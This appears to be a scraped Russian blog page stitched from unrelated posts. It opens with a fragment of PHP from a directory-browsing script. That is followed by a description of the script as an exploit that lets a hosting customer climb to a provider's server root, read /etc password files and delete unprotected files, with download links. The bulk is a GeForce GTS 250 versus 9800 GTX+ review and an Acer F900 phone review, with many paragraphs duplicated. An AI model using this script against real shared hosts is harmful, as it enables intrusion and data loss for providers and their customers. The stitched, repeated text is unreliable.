echo "".$lFiles[ $k ]->sfile." | \n"; break; case "dir": $tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name; echo "". $lFiles[ $k ]->name." | \n";
break;
case "file":
echo "".$lFiles[ $k ]->sfile." | \n"; break; default: echo "NO | \n"; break; } echo "
$from = $from - $step;
if( isset( $cd ) )
{
echo "\n";
}
echo "\n";
//echo "
from=$from;to=$to;n=$n\n";
echo "
\n";
if( $from >= 0 )
{
echo "Предыдущий/\n";
}
if( $to <= $n )
{
echo "Далее \n";
}
echo "
\n";
echo "\n";
echo "\n";
?> // говорим что PHP скрипт кончился
Вот реализация скрипта который позволяет вам получить доступ в каталоги провайдера содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, так же злоумышленник получает доступ до незабвенной папки etc где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера на которых разрешён запуск PHP оказались подвержены данной атаке. Опробованы методы атаки удалённых хостинговых компаний и провайдеров. Скрипт помещяется на сервер провайдера где вам разрешен запуск PHP скриптов как я уже сказал в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен (запущен) для того, что бы попасть в корневой каталог сервера жмите на ссылку "Подняться на каталог выше" до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно (очень редко) сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку "Подняться на каталог вверх" скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас миролюбиво пропустят. Эк сплоит данного скрипта предоставлен с ограничениями вы можете только просматривать содержимое папок и удалять файлы которые не защищены системой. Скрипт представлен только для того, что бы указать на возможность получения и удаления любой информации с сервера. Даже для среднего хацкера знать о системе провайдера всё это уже очень много.
Просмотреть исходник скрипта можно [здесь]
Скачать скрипт можно [здесь]
(Данная уязвимость устраняется установкой openBaseDir)
Метки: настройки
GeForce GTS 250 - третье поколение видеокарт на базе G92. Ждем G
Появлению третьей карты на базе полноценного чипа со
128 потоковыми процессорами способствовало отсутствие каких-либо
продуктов, относящихся к новой серии GeForce, в сегменте 100-200
долларов. С маркетинговой точки зрения заполнение линейки видеокарт
лучшим образом скажется на продажах, особенно при сильной конкуренции
со стороны AMD, которая уже набралась сил для противостояния с
калифорнийской компанией.
128 потоковыми процессорами способствовало отсутствие каких-либо
продуктов, относящихся к новой серии GeForce, в сегменте 100-200
долларов. С маркетинговой точки зрения заполнение линейки видеокарт
лучшим образом скажется на продажах, особенно при сильной конкуренции
со стороны AMD, которая уже набралась сил для противостояния с
калифорнийской компанией.
Естественно, выпустить продукт, в основе которого был
бы усеченный чип G200, окажется весьма дорогостоящим занятием, да и по
производительности он недалеко бы ушел от GeForce 9800 GTX+ на базе
55-нм G92b. Но раз нишу надо как-то заполнять, то почему бы
просто-напросто не переименовать уже имеющийся продукт? Тем более что
опыт у компании в этом плане достаточно большой.
бы усеченный чип G200, окажется весьма дорогостоящим занятием, да и по
производительности он недалеко бы ушел от GeForce 9800 GTX+ на базе
55-нм G92b. Но раз нишу надо как-то заполнять, то почему бы
просто-напросто не переименовать уже имеющийся продукт? Тем более что
опыт у компании в этом плане достаточно большой.
Сказано – сделано; на свет появился видеоакселератор
нового поколения, имя которому дали очень серьезное - GeForce GTS 250.
При этом по характеристикам он ничем не отличается от все того же
GeForce 9800 GTX+, разве что официально добавили поддержку одного
гигабайта видеопамяти. Еще немного упростили подсистему питания,
печатную плату и систему охлаждения. Все. Чем не повод дать новое имя
старому решению?
нового поколения, имя которому дали очень серьезное - GeForce GTS 250.
При этом по характеристикам он ничем не отличается от все того же
GeForce 9800 GTX+, разве что официально добавили поддержку одного
гигабайта видеопамяти. Еще немного упростили подсистему питания,
печатную плату и систему охлаждения. Все. Чем не повод дать новое имя
старому решению?
Так как карты GeForce GTS 250 и 9800 GTX+ ничем не отличаются между
собой в плане рабочих частот, то тестировать практически придется одни
и те же адаптеры, только в разных «обертках». Если, конечно, новинка не
будет оснащена целым гигабайтом видеопамяти – в этом случае сравнение
должно стать очень интересным. Именно для этих целей были взяты карты
Zotac GeForce GTS250 AMP! и Palit GF9800GTX+ 512M DDR3. Основные
характеристики рассматриваемых акселераторов занесены в таблицу,
представленную ниже.
Видеоадаптер
Zotac GeForce GTS250 AMP!
Palit GF9800GTX+ 512M DDR3
Ядро
G92b
G92b
Количество транзисторов, млн. шт
754
754
Техпроцесс, нм
55
55
Количество потоковых процессоров
128
128
Количество текстурных блоков
64
64
Количество блоков рендеринга
16
16
Частота ядра (номинал), МГц
750 (738)
745 (738)
Частота шейдерного домена (номинал), МГц
1890 (1836)
1848 (1836)
Шина памяти, бит
256
256
Тип памяти
GDDR3
GDDR3
Объём памяти, МБ
1024
512
Частота памяти (номинал), МГц
2300 (2200)
2200 (2200)
Поддерживаемая версия DirectX
10
10
Интерфейс
PCI Express 2.0
PCI Express 2.0
Осматриваем видеокартыZOTAC GeForce GTS250 AMP!Видеокарта
Zotac GeForce GTS250 AMP! поставляется в упаковке, выполненной в
фирменных желто-оранжевых тонах с добавлением черного, и с изображением
дракона, который обосновался на абревеатуре AMP!. На крышке коробки
есть небольшое окошко, через которое можно увидеть графический адаптер.
К слову, данное окошко на упаковках Zotac появилось лишь с выходом
серии GeForce GTX 200.
Тут же, кроме характеристик, отмечено наличие в комплекте поставки игры XIII Century и тестового пакета 3DMark Vantage.

Упаковка видеокарты ZOTAC GeForce GTS 250 AMP!
Комплект поставки:
- Переходник DVI/D-Sub
- Переходник DVI/HDMI
- Аудиокабель (S/PDIF)
- Переходник питания
- Диск с драйверами
- Диск с игрой XIII Century
- Диск с 3DMark Vantage
- Инструкции

Комплект поставки видеокарты ZOTAC GeForce GTS 250 AMP!
Дизайн видеокарты от Zotac немного отличается от референсного для
GeForce GTS 250, который в большей степени соответствует адаптерам
GeForce 8800 GTS 512MB. В нашем случае карта больше была похожа на 9800
GTX(+), как по длине печатной платы, так и по дизайну системы
охлаждения. На кожухе кулера возле периферийных разъемов имеются
отверстия для выхода части нагретого воздуха внутрь системного блока.
На обратной стороне акселератора есть свободные места для распайки
еще одного гигабайта видеопамяти, что для адаптера такого уровня явно
будет лишним – объем в 2 ГБ скорее станет востребованным в hi-end
решениях следующего поколения. Сейчас же для карт среднего класса
гигабайта более чем достаточно.
Для подключения мониторов на видеокарте предусмотрены два Dual-Link
DVI, к которым также можно подключить через переходник монитор или
телевизор с HDMI-интерфейсом. Для обычного телевизионного приемника
имеется HDTV-выход.

Периферийные разъемы на видеокарте ZOTAC GeForce GTS 250 AMP!
Разъем для подключения цифрового звука расположен возле пары
интерфейсов MIO, которые позволяют объединить три аналогичные карты в
режиме 3 Way-SLI. Правда, такая система вряд ли составит конкуренцию
паре GeForce GTX 260, которая будет стоить столько же.
Интересным образом организована система охлаждения карты,
конструкция которой больше соответствует решениям low-end-класса.
Большой кожух, который направляет поток воздуха к задней стенке
системного блока от турбины, остался на месте, но в свете повального
использования тепловых трубок даже в недорогих продуктах мы здесь
вместо этого наблюдаем банальный кусок алюминия с небольшим количеством
тонких ребер.
Конструкция радиатора, который отвечает за охлаждения только чипа и
памяти, цельная, что положительным образом может сказаться на
охлаждении элементов видеокарты.
Турбину, естественно, тихой не назовешь, но в игровой системе она не
особо будет заметна на фоне остальных работающих вентиляторов. Во время
серьезных баталий на нее вряд ли кто обратит внимание, в отличие
от шума такого же охлаждения в системе классом выше. Температура чипа
даже при использовании обычного алюминиевого радиатора оставалась в
переделах нормы и составляла лишь 81 °C под нагрузкой.
Оригинальный дизайн PCB по сравнению с картами GeForce 9800 GTX(+)
имеет менее сложную пятифазную подсистему питания, построенную по
формуле 4+1. Для подключения дополнительного питания на плате распаян
8-контактный разъем и, если в блоке питания отсутствует соответствующий
разъем, то можно будет воспользоваться комплектным переходником.
Графический процессор G92 ревизии B1 имеет номер 421, что
соответствует 55-нм ядру для карт GeForce GTS 250. Вокруг чипа есть
защитная рамка, которая позволяет избежать сколов ядра при установке
или смене системы охлаждения.

GPU G92-421-B1
В качестве памяти используется всего восемь микросхем общим объемом
1024 МБ производства Hynix, рассчитанные на эффективные 2400 МГц
(5RS1H23MFR-N2C). Шина памяти осталась прежней и составляет 256 бит.

Память Hynix 5RS1H23MFR-N2C
Так как карта относится к серии AMP!, то ее рабочие частоты
несколько завышены относительно референса - 750/1890 МГц (ядро и
шейдерный домен) и 2300 МГц (память) против 738/1836 МГц и 2200 МГц,
чип и память соответственно.

Характеристики ZOTAC GeForce GTS 250 AMP!
Разгон Zotac GeForce GTS250 AMP! оказался не особо впечатляющим и
составил всего лишь 792/1998 МГц по чипу и 2376 МГц по памяти.
Температура чипа при повышении частот поднялась лишь на один градус.

Температурный режим и уровень разгона ZOTAC GeForce GTS 250 AMP!
Palit GF9800GTX+ 512M DDR3Следующая
видеокарта от известной компании Palit поставляется в очень крупной
коробке с изображением Frobot’а, некого симбиоза лягушки и робота.
Ранее, лет пять назад, компанию можно было смело причислить к обычному
noname, но с недавних пор Palit делает успехи и завоевывает
популярность: чего только стоит ее серия Sonic с разогнанными решениями.

Упаковка видеокарты Palit GF9800GTX+ 512M DDR3
Комплект поставки:
- Переходник DVI/HDMI
- Аудиокабель (S/PDIF)
- Переходник питания
- Диск с драйверами
- Инструкция

Комплект поставки Palit GF9800GTX+ 512M DDR3
Карта выполнена на текстолите красного цвета, дизайн платы и СО при
этом полностью переработаны и имеют существенные отличия от
референсных. Длина адаптера такая же, как и у GeForce GTS 250, что
позволит без проблем установить карту в неглубоких корпусах, например,
в Cooler Master Mystique 632.
В плане подключения периферии Palit GF9800GTX+ 512M DDR3 может
похвастаться наличием разъемов HDMI, Dual-Link DVI и… аналоговым D-Sub,
что выглядит несколько странным. ТВ-выход не предусмотрен. Как и все
GeForce 9800 GTX(+), рассматриваемый акселератор поддерживает
возможность установки трех одинаковых карт для постройки тройного SLI.

Периферийные разъемы Palit GF9800GTX+ 512M DDR3
В системе охлаждения используется две тепловые трубки, по которым
тепло от чипа через медную вставку передается тонким алюминиевым
ребрам. Конструкция продувается крупным вентилятором с умеренным
уровнем шума, воздух от которого охлаждает также силовую обвязку, при
этом практически полностью остается в системном блоке. На память также
предусмотрена пластина-радиатор, чего нет у многих нереференсных
продуктов других производителей.
Несмотря на небольшие размеры, карта требует подключения двух
кабелей дополнительного питания с 6-контактными разъемами. Подсистема,
как и у предыдущей карты, немного упрощена, но также имеет четыре фазы
для чипа и одну для памяти.
В качестве графического процессора выступает G92-428 ревизии B1,
который также используется в производстве GeForce GTS 250. Практически
для выпуска новинок достаточно просто обновить BIOS карт GeForce 9800
GTX+, и тем самым получить карту последнего поколения среднего уровня.

GPU G92-428-B1
Память общим объемом 512 МБ набрана восьмью чипами Samsung,
рассчитанными на 2400 МГц DDR (K4J52324QE-BJ08). Шина доступа к
памяти - 256 бит.

Память Samsung K4J52324QE-BJ08
Рабочие частоты видеоадаптера равны 745/1848 МГц для чипа, что немного выше эталонных, и 2200 МГц для памяти.

Характеристики Palit GF9800GTX+ 512M DDR3
Разгон карты даже хуже продукта Zotac – 771/1890 МГц по чипу и 2332
МГц по памяти. Температура ядра под нагрузкой не превышала 77 градусов
Цельсия, в 2D-режиме – 60 °C.

Температурный режим и уровень разгона Palit GF9800GTX+ 512M DDR3
ТестированиеТестовая конфигурацияТестирование проводилось на следующем стенде:
Процессор:Тестирование проводилось в операционной системе Windows
o Intel Core 2 Duo E8500 (3,16@4,27 ГГц, FSB 450 МГц)
Материнская плата:o ASUS Rampage Formula (Intel X48)
Оперативная память:
o G.Skill F2-7200CL4D-2GBPI-B (2x2048 МБ, DDR2-900, 4-4-4-12-2T, dual channel)
Жёсткий диск:o Samsung HD252HJ (250 ГБ, SATA2)
Блок питания:
o Silver Power SP- S850
Операционная система:o Windows Vista x86 SP1
Vista Ultimate x86 SP1. Для видеокарт использовался драйвер ForceWare
182.08 и PhysX 9.09.02. Акселерация физических эффектов посредством
видеокарты была активирована.
В качестве тестовых приложений использовались синтетические пакеты
3DMark'06 и 3DMark Vantage от Futuremark Corp., шедевр игростроения от
Crytek – Crysis (тест проводился утилитой CrysisBenchmarkTool 1.05,
стандартный уровень), относительно недавно вышедший Far Cry 2
(встроенный бенчмарк), и бенчмарк Cryostasis TechDemo на базе игры
"Анабиоз: Сон разума" от украинских разработчиков из Action Forms.
Все измерения проводились при разрешении экрана 1280х1024, как самом
оптимальном для большинства TFT-мониторов, и 1600x1200 (кроме 3DMark'06
и 3DMark Vantage) для создания серьёзной нагрузки на видеоакселераторы.
Для 3DMark выставлялись настройки по умолчанию, в CrysisBenchmarkTool
1.05 тесты проходили с профилем High, для Far Cry 2 и Cryostasis
TechDemo использовались максимальные настройки. Кроме того, были
задействованы сглаживание уровня 4х (AA4x) и анизотропная фильтрация
16х (AF16x) для Crysis и AA4x для Far Cry 2. В драйверах AA и AF не
форсировались. На графиках с результатами отмечен как средний fps, так
и минимальный.
Результаты тестирования3DMark’s


В синтетических пакетах от Futuremark Corp. карта на базе GeForce
GTS 250 с 1 ГБ видеопамяти демонстрирует 2-4% превосходство над Palit
GF9800GTX+, которое может быть обусловлено либо оптимизацией со стороны
драйверов, либо же дополнительными 512 МБ памяти.
Far Cry 2




Игра Far Cry 2 чутко отреагировала на дополнительный объем памяти:
карта Zotac GeForce GTS250 AMP! проявила себя производительнее уже на
25 процентов, что с оптимизацией драйверов никак не сопоставить.
Отметим поднявшийся уровень минимального fps, который позволит более
комфортно играть при значительном использовании различных спецэффектов
в сцене.
Cryostasis TechDemo


Технологичная демка, использующая потенциал движка PhysX, почти не отреагировала на новинку с 1 ГБ памяти – всего 1-2 кадра.
Crysis




Аналогичная картина в Crysis, но с ростом разрешения и качества
графики дополнительные 512 МБ начинают играть решающую роль в
производительности, которая может достигать 15-процентного
превосходства над старыми решениями. Осталось лишь сравнить с GeForce
GTS 250 c различным объемом видеопамяти, что мы и сделаем в ближайшее
время.
ВыводыКазалось бы, что эпопея с
переименовыванием видеокарт на базе графического процессора G92 должна
была закончиться еще в прошлом году. Ан нет, чип получился настолько
удачным, что его можно использовать еще как минимум год-два. И нас
вскоре смогут порадовать такие акселераторы, как GeForce GT 350, GT 420
или даже GT 510. А почему бы и нет?
Компания AMD, прямой конкурент на графическом рынке, пока сбивает
цену, и в этом случае можно выпускать новые поколения видеокарт на базе
старых разработок, снижая их стоимость и позиционируя продукты все в
более низкие сегменты рынка. Канувшая в Лету 3dfx вела себя аналогичным
образом из-за просчета в управлении компании, пока ее не приобрела
NVIDIA. Ждет ли такая участь калифорнийцев? Сказать трудно.
Компания обладает огромным потенциалом инженеров и программистов и
без проблем сможет дать отпор либо снижением цен на
высокопроизводительные решения (читай, карты hi-end-класса), либо
разработкой и выпуском в срочном порядке нового продукта. Но конкурент
пока спит, причем, летаргическим сном, иначе как можно объяснить
появление чипа G92 в третьем поколении видеокарты серии GeForce?
Что касается так называемой новинки, то видеокарты GeForce GTS 250 в
референсном исполнении стали меньше по размерам и теперь больше
соответствуют картам GeForce 8800 GTS 512MB; официально обзавелись 1 ГБ
видеопамяти и даже могут комплектоваться удвоенным объемом. За счет
использования 55-нм чипа G92b подсистема питания несколько упростилась
по сравнению с GeForce 9800 GTX(+). Также производители смело могут
выпускать карты на переработанном дизайне PCB с оригинальной системой
охлаждения. Но самым главным преимуществом GeForce GTS 250 является
рекомендованная цена на видеокарты – около 130 долларов за
512-мегабайтную версию, что составит серьезную конкуренцию как
собственным решениям NVIDIA на базе G92, так и продуктам AMD.
Относительно карты Zotac GeForce GTS250 AMP! отметим повышенные
рабочие частоты, один гигабайт видеопамяти, который позволит более
комфортно играть при высоких разрешениях, и, конечно же, комплект
поставки, в который входят все необходимые аксессуары и дополнительные
бонусы в виде игры XIII Century и тестового пакета 3DMark Vantage.
Карта Palit GF9800GTX+ 512M DDR3 является крепким середнячком со
спартанским комплектом поставки, который, все же, приспособлен для
подключения к современному кинотеатру или монитору с HDMI-интерфейсом,
причем, подключить можно целых два устройства. Для обладателей
недорогих TFT-мониторов с аналоговым разъемом на акселераторе уже
предусмотрен D-Sub, что избавит от использования лишних переходников. А
вот отсутствие обычного ТВ-выхода несколько огорчает, учитывая
распространенность в наших краях стандартных телевизоров.
настроение: :)
хочется: LImp Bizkit
слушаю: Limp Bizkit
Быстрый обзор: коммуникатор Acer F900
Сразу стоит отметить, что в наших руках побывал инженерный образец
коммуникатора, поэтому ряд моментов пока оценить не удалось. В
частности, комплектацию и стабильность работы. Так что в скором времени
мы вернемся к этой модели и устроим сравнительное тестирование с HTC
Touch HD - ведь именно с ним Acer F900 и предстоит конкурировать.
Эти коммуникаторы очень похожи, как внешне, так и с технической
точки зрения. Несмотря на то, что в Acer F900 и HTC Touch HD
используются разные аппаратные платформы (в первом случае – Samsung, во
втором – Qualcomm), основные параметры обеих моделей практически
идентичны. Судите сами.
Форм-фактор: моноблок
Операционная система: Windows Mobile 6.1 Professional
Процессор: Samsung S3C 6410, 533 МГц
Память: 128 МБ ОЗУ, 256 МБ ПЗУ, слот microSDHC (поддержка карт объемом до 16 ГБ)
Мобильная связь/передача данных: GSM 850/900/1800/1900 МГц, UMTS 850/1900/2100 Мгц, GPRS/EDGE, HSDPA
Экран: сенсорный TFT, 3.8", 800 x 480, 65 536 цветов
Интерфейсы: USB 2.0, Bluetooth 2.0 (+EDR), Wi-Fi 802.11b/g
Камера: 3,2 мегапикселя, автофокус, вспышка, запись видео
GPS-приемник: SiRF Star III, поддержка A-GPS
Прочее: датчик освещенности, акселерометр (G-сенсор)
Аккумулятор: Li-Ion, съемный, 1530 мАч
Размеры: 117,5 х 63,5 х 12,9 мм
Вес: 150 г
Заявленное время работы: до 6 часов в режиме разговора, до 300 часов в режиме ожидания.
С момента вхождения корпорации E-Ten в состав Acer прошло не так
много времени, и во всех новинках Acer просматривается наследие марки
Glofiish. У Acer попросту не было времени на какие-то новые наработки и
соглашения. Плохо ли это? И да, и нет.
Плохо потому, что платформа с процессором Samsung S3C 6410
откровенно слабовата, несмотря на довольно высокую частоту процессора.
Acer F900 работает довольно медленно. Это заметно даже при работе с
интерфейсом, не говоря уже о быстродействии в ресурсоемких приложениях.
А хорошо потому, что на борту остался практически весь набор
программного обеспечения от E-Ten, который почти полностью избавляет
пользователя от установки каких-то дополнительных приложений. По
крайней мере, на первых порах. Из нового здесь – только оболочка Acer
Shell, о которой мы вкратце упоминали в превью.
На данный момент она не может похвастаться столь высокой скоростью
работы, как, например, HTC TouchFLO 3D или Samsung TouchWiz, однако при
дальнейшей доработке Acer Shell вполне может стать самым удобным и
необычным интерфейсом на рынке.
Acer Shell – это виджет с изображением комнаты, в которой
расположены трехмерные пиктограммы, открывающие доступ к основным
функциям коммуникатора. Нажатие на телефон открывает меню звонков,
касание конверта ведет к электронной почте и SMS-сообщениям; рамка с
фотографией символизирует папку с фото и видео-файлами и так далее.
Занимает все это три горизонтальных экрана (скроллинг осуществляется
соответствующим движением пальца слева направо или справа налево).
Чтобы избавить пользователя от лишних действий, в Acer предусмотрели
возможность перемещения пиктограмм. Это значит, что на первой странице
Acer Shell можно будет расположить все самое нужное и избавить себя от
необходимости совершать лишние движения для доступа к тем или иным
функциям. Привыкание происходит очень быстро, после чего работа с
другими оболочками для Windows Mobile уже не кажется такой комфортной,
как прежде.
Выглядит все это довольно симпатично и сдобрено качественной
анимацией. Но, конечно, не обошлось без недостатков. Главным минусом
Acer Shell является низкая скорость работы. Причем на данный момент
совершенно неясно, в чем причина: в "сырости" кода программы, в
устаревшей аппаратной платформе или же в том, что перед нами все-таки
инженерный образец, который еще не доведен до ума. Посмотрим, как дело
будет обстоять на готовых к продажам моделям. Пока же, вместо
промежуточного итога, можно сказать, что сама идея Acer Shell очень
хороша и свежа, но приложение требует дальнейшей доработки и
оптимизации.
Не желая отставать от конкурентов, Acer прибегла к использованию
акселерометра (G-Sensor), основное предназначение которого –
отслеживать положение устройства и менять при необходимости экранную
ориентацию. Функция, конечно, работает. Однако не так гладко, как
хотелось бы. На Apple iPhone или, например, на LG KM900 Arena разворот
картинки происходит мгновенно. А на F900 он занимает секунды
полторы-две, а если у вас будет запущено какое-нибудь "тяжелое"
приложение вроде Adobe Reader, то прежде чем среагировать на изменение
положения, коммуникатор "думает" секунд пять. В таком случае гораздо
удобнее задействовать смену ориентации на какую-нибудь аппаратную
кнопку и включать ландшафтную ориентацию лишь в случаях острой
необходимости. Опять же, нельзя сказать, в чем причина: в общей
тормознутости платформы или в прошивке инженерного образца.
А вот дизайн хорош безо всяких "но". Как уже упоминалось, Acer F900
очень похож на HTC Touch HD. Однако о копировании дизайна в данном
случае речь не идет. Более того, у модели от Acer есть ряд преимуществ.
Например, встроенная камера, располагающаяся на задней панели,
обходится без декоративной вставки, которая в случае с Touch HD
несколько увеличивала толщину корпуса и собирала царапины, что со
временем ухудшало внешний вид устройства. Acer F900 лишен этого
недостатка – объектив не выступает за пределы задней крышки.
Сам корпус довольно крупный, габариты незначительно отличаются от
HTC Touch HD в большую сторону (115 х 63 х 12 мм против 117,5 х 63,5 х
12,9 мм). Главной причиной таких размеров и, по совместительству, одной
из изюминок модели является экран с диагональю 3,8 дюйма. Матрица очень
качественная: с широкими углами обзора и впечатляющей яркостью. На
солнце, впрочем, экран все равно ведет себя не лучшим образом, но это
неизбежно при использовании TFT-матрицы. Разрешение 800 х 480 точек
отлично подходит для web-серфинга. При стандартных настройках шрифты на
многих сайтах получаются мелковатыми, но это легко исправить с помощью
функции масштабирования, присутствующей в любом браузере, включая
стандартный Internet Explorer.
Основные клавиши на лицевой панели сделаны в духе упомянутого
коммуникатора от HTC. Это четыре сенсорных участка с приятной голубой
подсветкой. Каждое нажатие сопровождается легкой вибрацией, поэтому с
кнопками без проблем можно работать вслепую.
Несмотря на то, что коммуникатор предназначен для управления
пальцами, стилус при нем все равно имеется. Перо немного странное. Оно
в меру тонкое, телескопическое и состоит из трех частей. F900 –
достаточно крупный коммуникатор, и в корпусе запросто можно было
разместить пенал для монолитного стилуса, а такое компактное
телескопическое решение слегка неожиданно. Впрочем, на удобстве работы
это никак не сказывается – стилус неплох.
В целом Acer F900 производит приятное впечатление. По качеству
исполнения он ничуть не уступает хваленому HTC Touch HD. От
окончательных выводов сейчас нас удерживает ряд нераскрытых вопросов.
Как коммуникатор проявит себя в тестах на воспроизведение видео и время
автономной работы? Смогут ли поступающие в продажу образцы избавиться
от подтормаживаний интерфейса? Последует ли обновление операционной
системы до Windows Mobile 6.5? Каким будет штатное навигационное ПО?
Продажи Acer F900 начнутся уже в этом месяце, а цена на старте
составит 25 тысяч рублей. Это немного больше, чем следовало ожидать, но
заявленная стоимость все равно не идет ни в какое сравнение с ценой HTC
Touch HD в момент запуска, которая составляла около 34 тысяч рублей. В
общем, следите за обновлениями и ждите подробного сравнительного
тестирования Acer F900 и HTC Touch HD.
коммуникатора, поэтому ряд моментов пока оценить не удалось. В
частности, комплектацию и стабильность работы. Так что в скором времени
мы вернемся к этой модели и устроим сравнительное тестирование с HTC
Touch HD - ведь именно с ним Acer F900 и предстоит конкурировать.
Эти коммуникаторы очень похожи, как внешне, так и с технической
точки зрения. Несмотря на то, что в Acer F900 и HTC Touch HD
используются разные аппаратные платформы (в первом случае – Samsung, во
втором – Qualcomm), основные параметры обеих моделей практически
идентичны. Судите сами.
Технические характеристики Acer F900
Форм-фактор: моноблок
Операционная система: Windows Mobile 6.1 Professional
Процессор: Samsung S3C 6410, 533 МГц
Память: 128 МБ ОЗУ, 256 МБ ПЗУ, слот microSDHC (поддержка карт объемом до 16 ГБ)
Мобильная связь/передача данных: GSM 850/900/1800/1900 МГц, UMTS 850/1900/2100 Мгц, GPRS/EDGE, HSDPA
Экран: сенсорный TFT, 3.8", 800 x 480, 65 536 цветов
Интерфейсы: USB 2.0, Bluetooth 2.0 (+EDR), Wi-Fi 802.11b/g
Камера: 3,2 мегапикселя, автофокус, вспышка, запись видео
GPS-приемник: SiRF Star III, поддержка A-GPS
Прочее: датчик освещенности, акселерометр (G-сенсор)
Аккумулятор: Li-Ion, съемный, 1530 мАч
Размеры: 117,5 х 63,5 х 12,9 мм
Вес: 150 г
Заявленное время работы: до 6 часов в режиме разговора, до 300 часов в режиме ожидания.
С момента вхождения корпорации E-Ten в состав Acer прошло не так
много времени, и во всех новинках Acer просматривается наследие марки
Glofiish. У Acer попросту не было времени на какие-то новые наработки и
соглашения. Плохо ли это? И да, и нет.
Плохо потому, что платформа с процессором Samsung S3C 6410
откровенно слабовата, несмотря на довольно высокую частоту процессора.
Acer F900 работает довольно медленно. Это заметно даже при работе с
интерфейсом, не говоря уже о быстродействии в ресурсоемких приложениях.
А хорошо потому, что на борту остался практически весь набор
программного обеспечения от E-Ten, который почти полностью избавляет
пользователя от установки каких-то дополнительных приложений. По
крайней мере, на первых порах. Из нового здесь – только оболочка Acer
Shell, о которой мы вкратце упоминали в превью.
На данный момент она не может похвастаться столь высокой скоростью
работы, как, например, HTC TouchFLO 3D или Samsung TouchWiz, однако при
дальнейшей доработке Acer Shell вполне может стать самым удобным и
необычным интерфейсом на рынке.
Acer Shell – это виджет с изображением комнаты, в которой
расположены трехмерные пиктограммы, открывающие доступ к основным
функциям коммуникатора. Нажатие на телефон открывает меню звонков,
касание конверта ведет к электронной почте и SMS-сообщениям; рамка с
фотографией символизирует папку с фото и видео-файлами и так далее.
Занимает все это три горизонтальных экрана (скроллинг осуществляется
соответствующим движением пальца слева направо или справа налево).
Чтобы избавить пользователя от лишних действий, в Acer предусмотрели
возможность перемещения пиктограмм. Это значит, что на первой странице
Acer Shell можно будет расположить все самое нужное и избавить себя от
необходимости совершать лишние движения для доступа к тем или иным
функциям. Привыкание происходит очень быстро, после чего работа с
другими оболочками для Windows Mobile уже не кажется такой комфортной,
как прежде.
Выглядит все это довольно симпатично и сдобрено качественной
анимацией. Но, конечно, не обошлось без недостатков. Главным минусом
Acer Shell является низкая скорость работы. Причем на данный момент
совершенно неясно, в чем причина: в "сырости" кода программы, в
устаревшей аппаратной платформе или же в том, что перед нами все-таки
инженерный образец, который еще не доведен до ума. Посмотрим, как дело
будет обстоять на готовых к продажам моделям. Пока же, вместо
промежуточного итога, можно сказать, что сама идея Acer Shell очень
хороша и свежа, но приложение требует дальнейшей доработки и
оптимизации.
Не желая отставать от конкурентов, Acer прибегла к использованию
акселерометра (G-Sensor), основное предназначение которого –
отслеживать положение устройства и менять при необходимости экранную
ориентацию. Функция, конечно, работает. Однако не так гладко, как
хотелось бы. На Apple iPhone или, например, на LG KM900 Arena разворот
картинки происходит мгновенно. А на F900 он занимает секунды
полторы-две, а если у вас будет запущено какое-нибудь "тяжелое"
приложение вроде Adobe Reader, то прежде чем среагировать на изменение
положения, коммуникатор "думает" секунд пять. В таком случае гораздо
удобнее задействовать смену ориентации на какую-нибудь аппаратную
кнопку и включать ландшафтную ориентацию лишь в случаях острой
необходимости. Опять же, нельзя сказать, в чем причина: в общей
тормознутости платформы или в прошивке инженерного образца.
А вот дизайн хорош безо всяких "но". Как уже упоминалось, Acer F900
очень похож на HTC Touch HD. Однако о копировании дизайна в данном
случае речь не идет. Более того, у модели от Acer есть ряд преимуществ.
Например, встроенная камера, располагающаяся на задней панели,
обходится без декоративной вставки, которая в случае с Touch HD
несколько увеличивала толщину корпуса и собирала царапины, что со
временем ухудшало внешний вид устройства. Acer F900 лишен этого
недостатка – объектив не выступает за пределы задней крышки.
Сам корпус довольно крупный, габариты незначительно отличаются от
HTC Touch HD в большую сторону (115 х 63 х 12 мм против 117,5 х 63,5 х
12,9 мм). Главной причиной таких размеров и, по совместительству, одной
из изюминок модели является экран с диагональю 3,8 дюйма. Матрица очень
качественная: с широкими углами обзора и впечатляющей яркостью. На
солнце, впрочем, экран все равно ведет себя не лучшим образом, но это
неизбежно при использовании TFT-матрицы. Разрешение 800 х 480 точек
отлично подходит для web-серфинга. При стандартных настройках шрифты на
многих сайтах получаются мелковатыми, но это легко исправить с помощью
функции масштабирования, присутствующей в любом браузере, включая
стандартный Internet Explorer.
Основные клавиши на лицевой панели сделаны в духе упомянутого
коммуникатора от HTC. Это четыре сенсорных участка с приятной голубой
подсветкой. Каждое нажатие сопровождается легкой вибрацией, поэтому с
кнопками без проблем можно работать вслепую.
Несмотря на то, что коммуникатор предназначен для управления
пальцами, стилус при нем все равно имеется. Перо немного странное. Оно
в меру тонкое, телескопическое и состоит из трех частей. F900 –
достаточно крупный коммуникатор, и в корпусе запросто можно было
разместить пенал для монолитного стилуса, а такое компактное
телескопическое решение слегка неожиданно. Впрочем, на удобстве работы
это никак не сказывается – стилус неплох.
В целом Acer F900 производит приятное впечатление. По качеству
исполнения он ничуть не уступает хваленому HTC Touch HD. От
окончательных выводов сейчас нас удерживает ряд нераскрытых вопросов.
Как коммуникатор проявит себя в тестах на воспроизведение видео и время
автономной работы? Смогут ли поступающие в продажу образцы избавиться
от подтормаживаний интерфейса? Последует ли обновление операционной
системы до Windows Mobile 6.5? Каким будет штатное навигационное ПО?
Продажи Acer F900 начнутся уже в этом месяце, а цена на старте
составит 25 тысяч рублей. Это немного больше, чем следовало ожидать, но
заявленная стоимость все равно не идет ни в какое сравнение с ценой HTC
Touch HD в момент запуска, которая составляла около 34 тысяч рублей. В
общем, следите за обновлениями и ждите подробного сравнительного
тестирования Acer F900 и HTC Touch HD.
настроение: :)
хочется: LImp Bizkit
слушаю: Limp Bizkit
Программы для получения прямых ссылок к файлам сервисов
Программы для получения прямых ссылок к файлам сервисов LetItBit.net, zShare.Net, Uploading.Com и FriendlyFiles.Net
FullURL (version 2.12) (Обновление от 12.02.08)
